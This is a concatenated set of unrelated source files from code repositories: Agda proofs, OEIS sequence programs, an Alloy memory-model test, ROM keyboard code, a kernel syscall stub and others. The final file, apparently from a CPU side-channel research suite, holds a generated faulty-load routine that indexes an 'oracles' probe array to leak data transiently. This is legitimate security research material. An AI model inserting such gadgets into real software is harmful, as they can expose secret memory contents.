<filename>OldBasicILP/Syntax/Translation.agda module OldBasicILP.Syntax.Translation where open import Common.Context public import OldBasicILP.Syntax.ClosedHilbertSequential as CHS import OldBasicILP.Syntax.ClosedHilbert as CH -- Translation from closed Hilbert-style sequential to closed Hilbert-style. mutual chsᵀ→chᵀ : CHS.Ty → CH.Ty chsᵀ→chᵀ (CHS.α P) = CH.α P chsᵀ→chᵀ (A CHS.▻ B) = chsᵀ→chᵀ A CH.▻ chsᵀ→chᵀ B chsᵀ→chᵀ (p CHS.⦂ A) = chsᴾ→chᴾ p CH.⦂ chsᵀ→chᵀ A chsᵀ→chᵀ (A CHS.∧ B) = chsᵀ→chᵀ A CH.∧ chsᵀ→chᵀ B chsᵀ→chᵀ CHS.⊤ = CH.⊤ chsᴾ→chᴾ : ∀ {Ξ A} → CHS.Proof Ξ A → CH.Proof (chsᵀ→chᵀ A) chsᴾ→chᴾ CHS.[ d ] = CH.[ chsᴰ→ch d top ] chsᴰ→ch : ∀ {Ξ A} → CHS.⊢ᴰ Ξ → A ∈ Ξ → CH.⊢ (chsᵀ→chᵀ A) chsᴰ→ch (CHS.mp i j d) top = CH.app (chsᴰ→ch d i) (chsᴰ→ch d j) chsᴰ→ch (CHS.ci d) top = CH.ci chsᴰ→ch (CHS.ck d) top = CH.ck chsᴰ→ch (CHS.cs d) top = CH.cs chsᴰ→ch (CHS.nec `d d) top = CH.box (chsᴰ→ch `d top) chsᴰ→ch (CHS.cdist {Ξ} {A} {B} {`Ξ₁} {`Ξ₂} {`d₁} {`d₂} d) top = oops {A} {B} {`Ξ₁} {`Ξ₂} {`d₁} {`d₂} chsᴰ→ch (CHS.cup d) top = CH.cup chsᴰ→ch (CHS.cdown d) top = CH.cdown chsᴰ→ch (CHS.cpair d) top = CH.cpair chsᴰ→ch (CHS.cfst d) top = CH.cfst chsᴰ→ch (CHS.csnd d) top = CH.csnd chsᴰ→ch (CHS.unit d) top = CH.unit chsᴰ→ch (CHS.mp i j d) (pop k) = chsᴰ→ch d k chsᴰ→ch (CHS.ci d) (pop k) = chsᴰ→ch d k chsᴰ→ch (CHS.ck d) (pop k) = chsᴰ→ch d k chsᴰ→ch (CHS.cs d) (pop k) = chsᴰ→ch d k chsᴰ→ch (CHS.nec `d d) (pop k) = chsᴰ→ch d k chsᴰ→ch (CHS.cdist d) (pop k) = chsᴰ→ch d k chsᴰ→ch (CHS.cup d) (pop k) = chsᴰ→ch d k chsᴰ→ch (CHS.cdown d) (pop k) = chsᴰ→ch d k chsᴰ→ch (CHS.cpair d) (pop k) = chsᴰ→ch d k chsᴰ→ch (CHS.cfst d) (pop k) = chsᴰ→ch d k chsᴰ→ch (CHS.csnd d) (pop k) = chsᴰ→ch d k chsᴰ→ch (CHS.unit d) (pop k) = chsᴰ→ch d k -- FIXME: I can’t even postulate this. -- postulate -- ᴬlem₁ : ∀ {Ξ₁ Ξ₂ A B} {d₁ : CHS.⊢ᴰ Ξ₁ , A CHS.▻ B} {d₂ : CHS.⊢ᴰ Ξ₂ , A} -- → chsᴰ→ch (CHS.appᴰ d₁ d₂) ≡ CH.app (chsᴰ→ch d₁ top) (chsᴰ→ch d₂ top) postulate oops : ∀ {A B Ξ₁ Ξ₂} {d₁ : CHS.⊢ᴰ Ξ₁ , A CHS.▻ B} {d₂ : CHS.⊢ᴰ Ξ₂ , A} → CH.⊢ chsᴾ→chᴾ CHS.[ d₁ ] CH.⦂ (chsᵀ→chᵀ A CH.▻ chsᵀ→chᵀ B) CH.▻ chsᴾ→chᴾ CHS.[ d₂ ] CH.⦂ chsᵀ→chᵀ A CH.▻ chsᴾ→chᴾ CHS.[ CHS.appᴰ d₁ d₂ ] CH.⦂ chsᵀ→chᵀ B chs→ch : ∀ {A} → CHS.⊢ A → CH.⊢ (chsᵀ→chᵀ A) chs→ch (Ξ , d) = chsᴰ→ch d top -- Translation from closed Hilbert-style to closed Hilbert-style sequential. mutual chᵀ→chsᵀ : CH.Ty → CHS.Ty chᵀ→chsᵀ (CH.α P) = CHS.α P chᵀ→chsᵀ (A CH.▻ B) = chᵀ→chsᵀ A CHS.▻ chᵀ→chsᵀ B chᵀ→chsᵀ (p CH.⦂ A) with chᴾ→chsᴾ p chᵀ→chsᵀ (p CH.⦂ A) | (Ξ , p′) = p′ CHS.⦂ chᵀ→chsᵀ A chᵀ→chsᵀ (A CH.∧ B) = chᵀ→chsᵀ A CHS.∧ chᵀ→chsᵀ B chᵀ→chsᵀ CH.⊤ = CHS.⊤ chᴾ→chsᴾ : ∀ {A} → CH.Proof A → ∃ (λ Ξ → CHS.Proof Ξ (chᵀ→chsᵀ A)) chᴾ→chsᴾ CH.[ d ] with ch→chs d chᴾ→chsᴾ CH.[ d ] | (Ξ , d′) = Ξ , CHS.[ d′ ] ch→chs : ∀ {A} → CH.⊢ A → CHS.⊢ (chᵀ→chsᵀ A) ch→chs (CH.app d₁ d₂) = CHS.app (ch→chs d₁) (ch→chs d₂) ch→chs CH.ci = ∅ , CHS.ci CHS.nil ch→chs CH.ck = ∅ , CHS.ck CHS.nil ch→chs CH.cs = ∅ , CHS.cs CHS.nil ch→chs (CH.box d) = CHS.box (ch→chs d) ch→chs CH.cdist = ∅ , CHS.cdist CHS.nil ch→chs CH.cup = ∅ , CHS.cup CHS.nil ch→chs CH.cdown = ∅ , CHS.cdown CHS.nil ch→chs CH.cpair = ∅ , CHS.cpair CHS.nil ch→chs CH.cfst = ∅ , CHS.cfst CHS.nil ch→chs CH.csnd = ∅ , CHS.csnd CHS.nil ch→chs CH.unit = ∅ , CHS.unit CHS.nil

src/Categories/Category/Monoidal/Bundle.agda

Trebor-Huang/agda-categories

279

8786

{-# OPTIONS --without-K --safe #-} -- Bundled version of Monoidal Category module Categories.Category.Monoidal.Bundle where open import Level open import Categories.Category.Core using (Category) open import Categories.Category.Monoidal.Core using (Monoidal) open import Categories.Category.Monoidal.Braided using (Braided) open import Categories.Category.Monoidal.Symmetric using (Symmetric) record MonoidalCategory o ℓ e : Set (suc (o ⊔ ℓ ⊔ e)) where field U : Category o ℓ e monoidal : Monoidal U open Category U public open Monoidal monoidal public record BraidedMonoidalCategory o ℓ e : Set (suc (o ⊔ ℓ ⊔ e)) where field U : Category o ℓ e monoidal : Monoidal U braided : Braided monoidal monoidalCategory : MonoidalCategory o ℓ e monoidalCategory = record { U = U ; monoidal = monoidal } open Category U public open Braided braided public record SymmetricMonoidalCategory o ℓ e : Set (suc (o ⊔ ℓ ⊔ e)) where field U : Category o ℓ e monoidal : Monoidal U symmetric : Symmetric monoidal open Category U public open Symmetric symmetric public braidedMonoidalCategory : BraidedMonoidalCategory o ℓ e braidedMonoidalCategory = record { U = U ; monoidal = monoidal ; braided = braided } open BraidedMonoidalCategory braidedMonoidalCategory public using (monoidalCategory)

oeis/024/A024908.asm

neoneye/loda-programs

11

103095

; A024908: Numbers k such that 9*k - 5 is prime. ; Submitted by <NAME> ; 2,4,8,12,16,18,22,24,26,32,38,42,46,52,56,64,68,72,74,82,84,86,88,92,96,98,108,114,116,122,126,134,138,144,148,154,156,162,164,166,172,176,178,186,192,194,196,198,204,208,222,224,226,232,238,254,264,266,284,296,298,302,304,306,308,312,318,334,336,338,346,352,354,358,362,364,368,372,374,382,386,394,396,402,404,416,422,428,436,448,456,462,472,474,478,492,494,502,506,508 mov $1,4 mov $2,$0 add $2,2 pow $2,2 lpb $2 add $1,8 sub $2,1 mov $3,$1 seq $3,10051 ; Characteristic function of primes: 1 if n is prime, else 0. sub $0,$3 add $1,10 mov $4,$0 max $4,0 cmp $4,$0 mul $2,$4 lpe mov $0,$1 sub $0,22 div $0,9 add $0,2

case-studies/performance/verification/alloy/ppc/tests/podrr005.als

uwplse/memsynth

19

2302

<filename>case-studies/performance/verification/alloy/ppc/tests/podrr005.als<gh_stars>10-100 module tests/podrr005 open program open model /** PPC podrr005 "Fre SyncsWW Rfe SyncdRW Rfe SyncdRW Rfe PodRR" Cycle=Fre SyncsWW Rfe SyncdRW Rfe SyncdRW Rfe PodRR Relax=PodRR Safe=Fre BCSyncsWW BCSyncdRW { 0:r2=z; 1:r2=z; 1:r4=x; 2:r2=x; 2:r4=y; 3:r2=y; 3:r4=z; } P0 | P1 | P2 | P3 ; li r1,1 | lwz r1,0(r2) | lwz r1,0(r2) | lwz r1,0(r2) ; stw r1,0(r2) | sync | sync | lwz r3,0(r4) ; sync | li r3,1 | li r3,1 | ; li r3,2 | stw r3,0(r4) | stw r3,0(r4) | ; stw r3,0(r2) | | | ; exists (z=2 /\ 1:r1=2 /\ 2:r1=1 /\ 3:r1=1 /\ 3:r3=0) **/ one sig x, y, z extends Location {} one sig P1, P2, P3, P4 extends Processor {} one sig op1 extends Write {} one sig op2 extends Sync {} one sig op3 extends Write {} one sig op4 extends Read {} one sig op5 extends Sync {} one sig op6 extends Write {} one sig op7 extends Read {} one sig op8 extends Sync {} one sig op9 extends Write {} one sig op10 extends Read {} one sig op11 extends Read {} fact { P1.write[1, op1, z, 1] P1.sync[2, op2] P1.write[3, op3, z, 2] P2.read[4, op4, z, 2] P2.sync[5, op5] P2.write[6, op6, x, 1] P3.read[7, op7, x, 1] P3.sync[8, op8] P3.write[9, op9, y, 1] P4.read[10, op10, y, 1] P4.read[11, op11, z, 0] } fact { z.final[2] } Allowed: run { Allowed_PPC } for 5 int expect 1

rom/keyboard.asm

hisahi/ellipse1100

0

161816

<gh_stars>0 ; Ellipse Workstation 1100 (fictitious computer) ; ROM code (keyboard code) ; ; Copyright (c) 2020 <NAME> (hisahi) ; ; Permission is hereby granted, free of charge, to any person obtaining a copy ; of this software and associated documentation files (the "Software"), to deal ; in the Software without restriction, including without limitation the rights ; to use, copy, modify, merge, publish, distribute, sublicense, and/or sell ; copies of the Software, and to permit persons to whom the Software is ; furnished to do so, subject to the following conditions: ; ; The above copyright notice and this permission notice shall be included in all ; copies or substantial portions of the Software. ; ; THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR ; IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, ; FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE ; AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER ; LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, ; OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE ; SOFTWARE. ; ; Written for the WLA-DX assembler ; .BANK 1 .ORG $4000 .DEFINE KEYBIO $7010 ; KEYCODETABLE, KEYB_APPLY_CAPS_TO_KEY in keytbls.asm .DEFINE KEYB_TMP_NMI $0EEA .DEFINE KEYB_NMI_TIMER $0EEC .DEFINE KEYB_TMP3 $0EEE .DEFINE KEYB_TMP2 $0EF0 .DEFINE KEYB_KEYDOWNX $0EF2 .DEFINE KEYB_TMP $0EF4 .DEFINE KEYB_NEWKEYPRESSED $0EF8 .DEFINE KEYB_NEWKEYPRESSEDL ($800000|KEYB_NEWKEYPRESSED) .DEFINE KEYB_KEYDOWNTICKS $0EFA .DEFINE KEYB_KEYMODIFIER1 $0EFC ; SC------ (shift, caps) .DEFINE KEYB_KEYMODIFIER2 $0EFD ; CA------ (ctrl, alt) .DEFINE KEYB_KEYDOWN $0EFE .DEFINE KEYB_KEYDOWNL ($800000|KEYB_KEYDOWN) ; characters .DEFINE KEYB_KEYCACHE $0F00 .MACRO ENTERKEYBRAM PHB PHD ACC8 LDA #$00 PHA PLB ACC16 LDA #$0E00 TCD .ENDM .MACRO EXITKEYBRAM PLD PLB .ENDM ; get currently pressed key in A ; supply value in A to check key repeat (higher value to repeat slower) ; supply value in X to apply new repeat value (if A=12, X=10 ; means 2 ticks to repeat again) ; carry set if it is a new key ; A is set to be 8-bit! KEYB_GET_PRESSED_KEY: ACC8 CMP $800000|KEYB_KEYDOWNTICKS.L BCS + TXA STA $800000|KEYB_KEYDOWNTICKS.L SEC BRA ++ + LDA KEYB_NEWKEYPRESSEDL.L ASL A ++ LDA KEYB_KEYDOWNL.L RTS ; reset key data KEYB_RESET_BUFFER: PHP AXY16 ENTERKEYBRAM STZ KEYB_KEYMODIFIER1.W STZ KEYB_KEYDOWN.W STZ KEYB_KEYDOWNTICKS.W STZ TEXT_CURSORTICKS.W STZ KEYB_KEYDOWNX.W DEC KEYB_KEYDOWNX.W EXITKEYBRAM PLP RTS KEYB_INC_NMI_TIMER: PHP ACC8 LDA #$01 STA KEYB_NMI_TIMER.L PLP RTS ; returns A 00000000ScCA0000 ; Shift, caps, Ctrl, Alt KEYB_GET_MODIFIERS: PHP ACC16 LDA #0 ACC8 LDA $800000|KEYB_KEYMODIFIER2.L LSR A LSR A ORA $800000|KEYB_KEYMODIFIER2.L PLP RTS KEYB_UPDATE_KEYS: PHP AXY16 ENTERKEYBRAM DEC KEYB_NMI_TIMER&$FF.B BRA KEYB_UPDATE_KEYS_IMMEDIATE@INNER ; updates key buffers ; X, Y preserved, A clobbered KEYB_UPDATE_KEYS_IMMEDIATE: PHP AXY16 ENTERKEYBRAM @INNER: PHX PHY STZ KEYB_NEWKEYPRESSED&$FF.B ; set "new key pressed" to 0 STZ KEYB_KEYMODIFIER1&$FF.B ; also KEYB_KEYMODIFIER2 LDA #0 ACC8 LDA KEYB_NMI_TIMER&$FF.B STA KEYB_TMP_NMI&$FF.B ; update modifiers (Ctrl, Shift, Alt, caps) LDA KEYBIO.W ; bit 3 = Ctrl, bit 4 = LSh, ; bit 5 = Caps ASL A ASL A ASL A BCC @NOCAPS ; C = caps PHA LDA KEYB_KEYMODIFIER1&$FF.B ORA #$40 ; caps: KM1 |= 0x40 STA KEYB_KEYMODIFIER1&$FF.B PLA @NOCAPS: ASL A BCC @NOLSHIFT ; C = left shift PHA LDA KEYB_KEYMODIFIER1&$FF.B ORA #$80 ; shift: KM1 |= 0x80 STA KEYB_KEYMODIFIER1&$FF.B PLA @NOLSHIFT: ASL A BCC @NOCTRL ; C = ctrl LDA KEYB_KEYMODIFIER2&$FF.B ORA #$80 ; ctrl: KM2 |= 0x80 STA KEYB_KEYMODIFIER2&$FF.B @NOCTRL: LDA KEYBIO+1.W ; bit 5 = LAlt AND #$20 BEQ @NOLALT LDA KEYB_KEYMODIFIER2&$FF.B ORA #$40 ; alt: KM2 |= 0x40 STA KEYB_KEYMODIFIER2&$FF.B BRA @NORALT @NOLALT: LDA KEYBIO+11 ; bit 5 = RAlt AND #$20 BEQ @NORALT LDA KEYB_KEYMODIFIER2&$FF.B ORA #$40 ; alt: KM2 |= 0x40 STA KEYB_KEYMODIFIER2&$FF.B @NORALT: LDA KEYBIO+13 ; bit 4 = Rshift AND #$10 BEQ @NORSHIFT LDA KEYB_KEYMODIFIER1&$FF.B ORA #$80 ; shift: KM1 |= 0x80 STA KEYB_KEYMODIFIER1&$FF.B @NORSHIFT: ; update main keyboard cache ACC8 LDX #15 @KEYLOOP: STX KEYB_TMP3&$FF.B LDA KEYBIO.W,X ; load A with key matrix value TAY TXA ; \ ASL A ; | ASL A ; | ASL A ; | TAX ; / X = X << 3 STX KEYB_TMP2&$FF.B TYA .REPEAT 8 LSR A ; move lowest bit to C STA KEYB_TMP&$FF.B ; save old A (remaining bits) BIT KEYB_KEYMODIFIER1&$FF.B ; check if CAPS applies BVC + ; move to (next) + if no caps LDA KEYB_APPLY_CAPS_TO_KEY.W,X ; <>$00 if caps should matter BEQ + ; else skip to (next) + TXA ; \ EOR #$80 ; | X ^= 0x80 TAX ; / + BIT KEYB_KEYMODIFIER1&$FF.B ; check if SHIFT applies BPL + ; move to (next) + if no shift TXA ; \ EOR #$80 ; | X ^= 0x80 TAX ; / + LDA KEYCODETABLE.W,X ; load key's ASCII code BEQ ++++ ; if 0, skip to store... TAY ; ...else put it in Y LDX KEYB_TMP2&$FF.B ; restore original shifted X LDA #0 ; storing #0 to cache if key up ; the next instruction checks C which should still have the lowest bit BCC +++ ; key is not down? go to +++ DEC A ; A = #$FF. key is down CPY #$0080 ; if Y >= $0080 BCS ++++ ; skip to cache store (++++) CPX KEYB_KEYDOWNX&$FF.B ; is "current key" this key? BEQ + ; if it is, go to (next) + LDA KEYB_KEYCACHE.W,X ; get old key cache value BNE ++++ ; key already down? go to ++++ STZ KEYB_KEYDOWNTICKS&$FF.B ; zero out key down ticks STY KEYB_KEYDOWN&$FF.B ; store new current key STX KEYB_KEYDOWNX&$FF.B ; and "scan code" LDA #$FF ; load #$FF again to store to STA KEYB_NEWKEYPRESSED&$FF.B ; "new key pressed" BRA _f ; skip some redundant insrts + LDA KEYB_TMP_NMI&$FF.B ; check NMI timer BEQ ++ ; increase key down ticks __ INC KEYB_KEYDOWNTICKS&$FF.B ; only if NMI timer <>0 ++ LDA #$FF ; load #$FF again to store to BRA ++++ ; cache, and go to ++++ +++ CPX KEYB_KEYDOWNX&$FF.B ; key up is "current code"? BNE ++++ ; if not, skip STZ KEYB_KEYDOWN&$FF.B ; \ zero out "current code" DEC (KEYB_KEYDOWNX+1)&$FF.B ; cur. "scan" = $FFxx (invalid) ++++ LDX KEYB_TMP2&$FF.B ; restore original shifted X STA KEYB_KEYCACHE.W,X ; store $00 or $FF to cache LDA KEYB_TMP&$FF.B ; restore remaining bits INX STX KEYB_TMP2&$FF.B .ENDR LDX KEYB_TMP3&$FF.B ; restore unshifted X DEX BMI @KEYLOOPEND JMP @KEYLOOP @KEYLOOPEND: PLY PLX STZ KEYB_NMI_TIMER&$FF.B EXITKEYBRAM PLP RTS .ORG $7FE8 KEYB_GET_MODIFIERS_TRAMPOLINE: JSR KEYB_GET_MODIFIERS.W RTL .ORG $7FEC KEYB_INC_NMI_TIMER_TRAMPOLINE: JSR KEYB_INC_NMI_TIMER.W RTL .ORG $7FF0 KEYB_UPDATE_KEYS_IMMEDIATE_TRAMPOLINE: JSR KEYB_UPDATE_KEYS_IMMEDIATE.W RTL .ORG $7FF4 KEYB_GET_PRESSED_KEY_TRAMPOLINE: JSR KEYB_GET_PRESSED_KEY.W RTL .ORG $7FF8 KEYB_RESET_BUFFER_TRAMPOLINE: JSR KEYB_RESET_BUFFER.W RTL .ORG $7FFC KEYB_UPDATE_KEYS_TRAMPOLINE: JSR KEYB_UPDATE_KEYS.W RTL

programs/oeis/106/A106154.asm

neoneye/loda

22

165110

; A106154: Generation 5 of the substitution 1->{2, 1, 2}, 2->{3, 2, 3}, 3->{4, 3, 4}, 4->{5, 4, 5}, 5->{6, 5, 6}, 6->{1, 6, 1}, starting with 1. ; 6,5,6,5,4,5,6,5,6,5,4,5,4,3,4,5,4,5,6,5,6,5,4,5,6,5,6,5,4,5,4,3,4,5,4,5,4,3,4,3,2,3,4,3,4,5,4,5,4,3,4,5,4,5,6,5,6,5,4,5,6,5,6,5,4,5,4,3,4,5,4,5,6,5,6,5,4,5,6,5,6,5,4,5,4,3,4,5,4,5,4,3,4,3,2,3,4,3,4,5 seq $0,62756 ; Number of 1's in ternary (base-3) expansion of n. sub $1,$0 add $1,6 mov $0,$1

src/asf-requests-tools.ads

Letractively/ada-asf

0

13081

<filename>src/asf-requests-tools.ads ----------------------------------------------------------------------- -- asf.requests.tools -- ASF Requests Tools -- Copyright (C) 2010 <NAME> -- Written by <NAME> (<EMAIL>) -- -- Licensed under the Apache License, Version 2.0 (the "License"); -- you may not use this file except in compliance with the License. -- You may obtain a copy of the License at -- -- http://www.apache.org/licenses/LICENSE-2.0 -- -- Unless required by applicable law or agreed to in writing, software -- distributed under the License is distributed on an "AS IS" BASIS, -- WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -- See the License for the specific language governing permissions and -- limitations under the License. ----------------------------------------------------------------------- package ASF.Requests.Tools is -- Builds a printable representation of the request for debugging purposes. -- When <b>Html</b> is true, the returned content contains an HTML presentation. function To_String (Req : in Request'Class; Html : in Boolean := False; Print_Headers : in Boolean := True; Print_Attributes : in Boolean := False) return String; -- Set the internal context associated with a request: -- <ul> -- <li>The servlet that processes the request, -- <li>The response associated with the request -- </ul/ procedure Set_Context (Req : in out Request'Class; Servlet : access ASF.Servlets.Servlet'Class; Response : in ASF.Responses.Response_Access); end ASF.Requests.Tools;

programs/oeis/168/A168187.asm

neoneye/loda

22

165092

<reponame>neoneye/loda<gh_stars>10-100 ; A168187: a(n) = n^3*(n^6 + 1)/2. ; 0,1,260,9855,131104,976625,5038956,20176975,67109120,193710609,500000500,1178974511,2579891040,5302250785,10330524764,19221681375,34359740416,59293940705,99179648100,161343852319,256000004000,397140027921,603634614220,900576336815,1320903777024,1907348640625,2714751848276,3812798752335,5289227987680,7253573000129,9841500013500,13219811095231,17592186060800,23205742218945,30358496402884,39407819357375,50779978357536,64980869922865,82608050658860,104364180609039,131072000032000,163690967231441,203335691961780,251296306008175,309060919797344,378340321334625,461095081383196,559565236603295,676302730352640,814206799014049,976562500062500,1167082586611551,1389952941888160,1649881795975505,1952152956235404,2302683292075375,2708084724160256,3175730977784625,3713829369920020,4331497909430159,5038848000108000,5847073046530561,6768543273250940,7816907078551935,9007199254872064,10355956419082625,11881340007043716,13603267198297855,15543550148372000,17726043917952369,20176803500171500,22924250359403471,25999348907301120,29435793354328465,33270205387742324,37542343139859375,42295321923508576,47575847224813985,53434460456879580,59925797991555679,67108864000256000,75047317648765281,83809775205129700,93470127634056095,104107874265761184,115808473141908625,128663708656149836,142772077121844015,158239190914773760,175178201854095089,193710244500364500,213964900065270991,236080681643667680,260205541494645825,286497401114723644,315124704862733375,346266997912682496,380115529327738945,416873881065545540,456758623742305599 mov $1,$0 pow $0,9 pow $1,3 add $0,$1 div $0,2

examples/W/W.asm

brickpool/hp35s

3

87699

<reponame>brickpool/hp35s ; Day of the week for any date since September 14, 1752 MODEL P35S SEGMENT CODE LBL W ; program W ; REGZ = dd ; REGY = mm ; REGX = yyyy STO A ; A = y Rv ; f = IP(1/REGX+0.5) ENTER 1/x 0.5 + IP ; REGX is 1 if January or February, otherwise 0 STO- A ; A = y - REGX 12 * + ; if January or February then REGX = m+12 else REGX = m+0 ; n1 = IP(13/5*(m+1)) 1 + ; REGX = m + 1 ; 2.6 * IP ; REGY = d, REGX = n1 + x<> A ; A = d + n1, REGX = y ; n2 = IP(5/4*y) ENTER ENTER ENTER 1.25 * IP ; REGX = n2 STO+ A ; A = d + n1 + n2 ; n3 = IP(y/100) Rv 100 / IP ; REGX = n3 STO- A ; A = d + n1 + n2 - n3 ; n4 = IP(y/400) Rv 400 / IP ; REGX = n4 RCL+ A ; REGX = d + n1 + n2 - n3 + n4 7 RMDR ; REGX = (d + n1 + n2 - n3 + n4) mod 7 ; REGX = w RTN ENDS END ; CK=8DE1 ; LN=137

test/Succeed/Issue1436-7.agda

shlevy/agda

1,989

11286

<reponame>shlevy/agda postulate F : Set₂ → Set₃ #_ : Set₁ → Set₂ !_ : Set₀ → Set₁ infix 1 F infix 2 #_ infix 3 !_ syntax F x = ! x ok₁ : Set₁ → Set₃ ok₁ X = ! # X ok₂ : Set₀ → Set₂ ok₂ X = # ! X

asm/testy4.asm

icefoxen/lang

0

14642

; Compile WITH: ; nasm -f elf testy4.asm ; gcc testy4.o ; For some weird weird diseased wrong reason, you have to run the object file ; through gcc, it doesn't work alone with ld. I think it has something to do ; with how it sets up the _start procedure. global main segment .data segment .bss segment .docstring maindoc db "Foody foody foo!", 0 segment .text main: ; This instruction is necessary if you don't want a segfault ;enter 0, 0 ; This one is optional but it's good to save the old state... ;pusha push eax push ebx pop ebx pop eax ; the mov isn't necessary, but it's a good thing to leave ; memory in a consistant state. ;mov eax, 0 ;leave ret

oeis/021/A021507.asm

neoneye/loda-programs

11

18440

<gh_stars>10-100 ; A021507: Decimal expansion of 1/503. ; Submitted by <NAME>(s1.) ; 0,0,1,9,8,8,0,7,1,5,7,0,5,7,6,5,4,0,7,5,5,4,6,7,1,9,6,8,1,9,0,8,5,4,8,7,0,7,7,5,3,4,7,9,1,2,5,2,4,8,5,0,8,9,4,6,3,2,2,0,6,7,5,9,4,4,3,3,3,9,9,6,0,2,3,8,5,6,8,5,8,8,4,6,9,1,8,4,8,9,0,6,5,6,0,6,3,6,1 add $0,1 mov $1,10 pow $1,$0 div $1,503 mov $0,$1 mod $0,10

kernel/int/syscall.asm

ethan4984/rock

207

164459

<filename>kernel/int/syscall.asm %macro pushall 0 push rax push rbx push rcx push rdx push rbp push rdi push rsi push r8 push r9 push r10 push r11 push r12 push r13 push r14 push r15 %endmacro %macro popall 0 pop r15 pop r14 pop r13 pop r12 pop r11 pop r10 pop r9 pop r8 pop rsi pop rdi pop rbp pop rdx pop rcx pop rbx pop rax %endmacro global syscall_main extern syscall_view syscall_main: swapgs mov qword [gs:16], rsp ; save user stack mov rsp, qword [gs:8] ; init kernel stack sti push rcx ; rip push r11 ; rflags push 0x1b ; ss push qword [gs:16] ; rsp push r11 ; rflags push 0x23 ; cs push rcx ; rip push 0 push 0 pushall mov rdi, rsp call syscall_view popall add rsp, 56 pop r11 ; rflags pop rcx ; rip cli mov rdx, qword [gs:24] ; errno mov rsp, qword [gs:16] ; user stack swapgs o64 sysret ; ensure rex.w=1

kernel_entry/kernel_entry.asm

Mollenthe4th/OS

0

84311

global _start; [bits 32] _start: [extern kernel_main] call kernel_main jmp $

test2.asm

jbush001/MiteCPU

12

245379

# # Store values into a memory array # res result res count res buffer, 8 res ptr start: ldi 8 st count ldi buffer st ptr loop: ldi 0 # Clear accumulator add count # Copy count into accumulator index ptr # Load destination pointer st 0 # Store count into destination pointer ldi 1 add ptr st ptr # Increment pointer ldi -1 add count # Decrement count st count # Update count bl done # Finished? if so, branch out ldi -1 # Branch unconditionally bl loop # loop again done: ldi -1 bl done # Infinite loop

Transynther/x86/_processed/NONE/_zr_/i9-9900K_12_0xca.log_21829_886.asm

ljhsiun2/medusa

9

25255

.global s_prepare_buffers s_prepare_buffers: push %r11 push %r12 push %r14 push %rax push %rbx push %rcx push %rdi push %rsi lea addresses_UC_ht+0x19b14, %rsi lea addresses_WC_ht+0x4d34, %rdi nop nop nop nop xor $9257, %rax mov $90, %rcx rep movsq nop nop nop nop nop inc %rbx lea addresses_normal_ht+0x131f8, %rsi lea addresses_D_ht+0x170e4, %rdi xor %r14, %r14 mov $33, %rcx rep movsb nop nop nop nop cmp %rbx, %rbx lea addresses_A_ht+0x1c034, %rsi lea addresses_A_ht+0x2934, %rdi nop nop nop nop add %r11, %r11 mov $2, %rcx rep movsw nop nop nop nop nop dec %rbx lea addresses_UC_ht+0x4934, %rbx nop nop nop nop sub $39546, %r14 mov (%rbx), %esi sub $7339, %rcx lea addresses_A_ht+0x19fbc, %rsi lea addresses_WT_ht+0x11d34, %rdi nop nop sub %r12, %r12 mov $5, %rcx rep movsq nop nop nop nop dec %rax lea addresses_WT_ht+0x150b4, %r14 xor $41198, %rsi movups (%r14), %xmm5 vpextrq $0, %xmm5, %rdi nop nop nop nop nop add $7251, %r14 lea addresses_UC_ht+0x136d0, %r12 nop nop nop sub %rcx, %rcx mov (%r12), %rsi nop nop add %rax, %rax lea addresses_A_ht+0x9eac, %r14 clflush (%r14) nop nop nop lfence mov $0x6162636465666768, %r12 movq %r12, (%r14) cmp %rcx, %rcx lea addresses_A_ht+0x14a2c, %r14 nop nop nop nop nop xor $23202, %r11 mov (%r14), %si nop nop xor %rdi, %rdi pop %rsi pop %rdi pop %rcx pop %rbx pop %rax pop %r14 pop %r12 pop %r11 ret .global s_faulty_load s_faulty_load: push %r10 push %r13 push %r15 push %rbx push %rsi // Faulty Load lea addresses_A+0xcd34, %r15 xor $63777, %rsi mov (%r15), %bx lea oracles, %r10 and $0xff, %rbx shlq $12, %rbx mov (%r10,%rbx,1), %rbx pop %rsi pop %rbx pop %r15 pop %r13 pop %r10 ret /* <gen_faulty_load> [REF] {'OP': 'LOAD', 'src': {'size': 4, 'NT': False, 'type': 'addresses_A', 'same': False, 'AVXalign': False, 'congruent': 0}} [Faulty Load] {'OP': 'LOAD', 'src': {'size': 2, 'NT': False, 'type': 'addresses_A', 'same': True, 'AVXalign': False, 'congruent': 0}} <gen_prepare_buffer> {'OP': 'REPM', 'src': {'same': False, 'type': 'addresses_UC_ht', 'congruent': 2}, 'dst': {'same': True, 'type': 'addresses_WC_ht', 'congruent': 11}} {'OP': 'REPM', 'src': {'same': False, 'type': 'addresses_normal_ht', 'congruent': 0}, 'dst': {'same': False, 'type': 'addresses_D_ht', 'congruent': 4}} {'OP': 'REPM', 'src': {'same': False, 'type': 'addresses_A_ht', 'congruent': 4}, 'dst': {'same': False, 'type': 'addresses_A_ht', 'congruent': 9}} {'OP': 'LOAD', 'src': {'size': 4, 'NT': False, 'type': 'addresses_UC_ht', 'same': False, 'AVXalign': False, 'congruent': 4}} {'OP': 'REPM', 'src': {'same': False, 'type': 'addresses_A_ht', 'congruent': 2}, 'dst': {'same': False, 'type': 'addresses_WT_ht', 'congruent': 11}} {'OP': 'LOAD', 'src': {'size': 16, 'NT': False, 'type': 'addresses_WT_ht', 'same': False, 'AVXalign': False, 'congruent': 7}} {'OP': 'LOAD', 'src': {'size': 8, 'NT': False, 'type': 'addresses_UC_ht', 'same': True, 'AVXalign': False, 'congruent': 0}} {'OP': 'STOR', 'dst': {'size': 8, 'NT': False, 'type': 'addresses_A_ht', 'same': False, 'AVXalign': False, 'congruent': 0}} {'OP': 'LOAD', 'src': {'size': 2, 'NT': False, 'type': 'addresses_A_ht', 'same': False, 'AVXalign': True, 'congruent': 2}} {'00': 21829} 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 